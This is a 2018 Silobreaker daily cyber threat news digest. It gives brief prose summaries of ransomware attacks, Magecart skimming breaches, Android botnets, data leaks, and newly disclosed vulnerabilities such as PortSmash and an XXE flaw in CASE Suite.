Silobreaker Daily Cyber Digest – 05 November 2018
ESC Corporate Services targeted by ransomware
- Toronto-based ESC Corporate Services, a licensed government provider of access to government records and government registration and filing services, has been hit by a ransomware attack. The attack was first detected on October 25th, 2018.
- The data affected includes corporation records, names, addresses, and registration of liens for automobile, boat and equipment leases.
New ransomware discovered installing DiskCryptor
- The ransomware installs DiskCryptor and reboots the computer. Victims are then sent a ransom note that states that their disk is being encrypted and how they can pay the ransom. DiskCryptor encrypts the whole disk and then prompts the user to enter a password on reboot.
- MalwareHunterTeam has observed that the ransomware is being run manually or is being called by another script, because it requires an argument to be passed to the program, which is used by the password for DiskCryptor. There is also a possibility that the threat actors are hacking into the Remote Desktop Services and installing the ransomware manually.
F Secure observe new spam campaign targeting Mac users that use Exodus
- The spam email contains an attachment called ‘Exodus-MacOS-1.64.1-update[.]zip’ that attempts to deliver a fake Exodus update using the subject line ‘Update 1.64.1 Release – New Assets and more’.
- The attached archive leads to an application that contains a mach-O binary with the filename ‘rtcfg’. Analysis of the strings showed references to the ‘relatime-spy-mac[.]com’ website which provides a cloud-based surveillance and remote spy tool. The spy tool supports Windows as well as Mac.
Trinity and FBot botnets competing for control over unsecured Android devices
- The Trinity and FBot botnets are in direct competition for the control over unsecured Android devices. In particular devices that have an exposed diagnostic port 5555 are affected. The port hosts a standard Android feature called Android Debug Bridge (ADB).
- The Trinity botnet uses the access to plant a cryptominer onto the affected device. The purpose of the Fbot botnet remains unknown, however, FBot was found to contain special code designed to search for Trinity’s file names and remove it.
Hacker groups increasingly use log file destruction to hide their attacks
- Carbon Black released a report on 113 investigations its incident response partners had performed detailing how cyber attacks carried out by nation-state actors were increasingly destroying log data, antivirus logs, and security logs in order to make it more difficult for Incident Response teams to access and investigate data.
Security researcher analyses compromised e-commerce websites
- Researcher Brian Krebs has released in-depth analysis of compromised websites and the methods attackers use to place tiny snippets of malicious code that invoke hostile domains onto the targeted sites.
- Krebs provides an example of card-skimming code being placed on asianfoodgrocer[.]com, hosted on the zoobashop[.]com domain. Zoobashop was discovered to be a currently hacked e-commerce site based in Ghana, that servers a tiny obfuscated script named js[.]js, stealing data submitted into online forms.
- Other examples include setting up malicious domains that mimic the original host domain, for example bargainjunkie[.]com was mimicked by barganljunkie[.]com.
Leaks and Breaches
Magecart malware steals Kitronik’s customers’ data
- The website of Kitronik, an educational electronics provider, has been compromised by the Magecart malware. According to the company, the malware was present on their website between August and September 2018.
- The data breached includes customer names, emails, card numbers, card expiry dates, CVVs and postal addresses. A company spokesman has stated that customers who had set up their account prior to August 2018 are likely to not have been affected.
- It is unclear how many individuals were affected by the breach.
Hackers steal documents on French nuclear power plants and prisons
- German and French media reported that hackers stole over 11,000 sensitive files pertaining to high-security prison video camera locations, a planned nuclear-waste dump, and to a thousand employees of the French firm Ingerop.
Data leak of Moscow internet provider Akado Telecom affects thousands of wealthy residents
- Customers’ personal data including names, home addresses and mobile phone numbers were exposed on an international not-for-profit internet registry database.
- Reuters observed the exposed personal data of prominent Russian individuals including a government official, a film director and a businessman.
New Microsoft Edge browser zero-day remote code execution exploit discovered
- Researchers announced on Twitter on Wednesday that they had compromised Microsoft Edge, with proof in the format of an image that displayed a web browser appearing to launch the Windows Calculator app.
- Researchers Yushi Liang and Alexander Kochkov are working on developing a stable exploit and attaining full sandbox escaping of the code. They were also looking for a method to escalate execution privileges to SYSTEM to gain full control of the machine.
New PortSmash side-channel vulnerability discovered
- PortSmash uses a timing attack to steal information from other processes running in the same CPU core with SMT/hyperthreading enabled. Researchers testing this attack were able to steal the private decryption key from an OpenSSL thread running in the same core as their exploit.
- The Portsmash vulnerability was discovered by researchers from the Tampere University of Technology in Finland and the Universidad Tecnologica de la Habana in Cuba. Their research has been submitted in the paper ‘Port Contention for Fun and Profit’.
Serious vulnerability found in CASE Suite software
- Researcher Gjoko Krstic discovered a high severity vulnerability, tracked as CVE-2018-17912, in the building automation software CASE Suite sold by Swiss-based FR. Sauter AG. The flaw affects CASE Suite versions 3.10 and earlier.
- The vulnerability is an XML external entity (XXE) bug ‘using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via [an] out-of-band (OOB) attack’.
- An attacker can exploit the vulnerability to steal files from the compromised device, including configuration data, personal information, account credentials and details about the system and the network housing it. The flaw has since been patched.
Research from University of California suggests ‘sniffing’ attacks can reveal browser history
- Modern browsers such as Chrome, Firefox and Edge have vulnerabilities that allow malicious websites to extract thousands of URLs in a user’s web history. The vulnerabilities are reportedly built into the way these browsers structure links, which means that major structural changes would have to take place to fix them.
- Tor was the only browser immune to these attacks, due to it not keeping track of a user’s internet history.
- Lead research Michael Smith stated that fixes would take several months to a year to implement.
Domain name EasyDNS admits to accidentally leaking contact details
- The leak affected 1,500 domain owners in Whois query results for just over 24 hours. The records include names, phone numbers, email addresses and postal addresses, which should have remained private in Whois searches.
- The information was reportedly exposed by a bug in the system that was provided by Tucows, which is used by EasyDNS in its backend to manage domain names. On October 25th Tucows deployed some new components that contained the software bug.
News apps and apps for children found to contain largest amount of third-party trackers
- Researchers from the University of Oxford studied nearly one million Android apps on the UK and US Google Play Store to find that 90% of them contain at least one third-party tracker. Their findings also reveal that specifically news apps and apps targeted at children contain the highest numbers of trackers.
Brian Kemp’s office launches investigation into alleged hacking attempt by Democratic Party
- Secretary of State Brian Kemp’s office has stated that they will be investigating the Democratic Party in relation to an alleged attempt to hack Georgia’s online voter database.
- The alleged hacking altered voters’ information or removed them from the registered voter list altogether. So far, no evidence has been provided in support of the claim.
Former CIA employee reportedly leaked national defense materials from prison
- Joshua Adam Schulte was originally arrested for leaking information on the CIA’s hacking tools to Wikileaks, that he stole in 2016 when he was working for the CIA. Federal prosecutors recently issued another indictment against Schulte, claiming he attempted to keep leaking information from prison, including classified information and search warrant materials.
Twitter deletes 10,000 bot accounts discouraging people from voting in US midterms
- Twitter deleted the accounts, which falsely appeared to be issued by the Democratic Party. The Democratic Congressional Campaign Committee campaigned to get the fraudulent accounts deleted as part of its response to the bots spreading fake and negative information on the 2016 Democratic presidential candidate Hillary Clinton.
Ransomware bundles sold on dark web for cut prices
- Samsam ransomware is reportedly included in the 23 ransomware bundle, as well as other variants such as Magniber, Satan, CryBrazil and XiaoBa. The bundle was discovered by security firm Sixgill for $750 and also includes tutorials and instructions on how to use the ransomware, and how to exploit vulnerabilities such as the EternalBlue.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.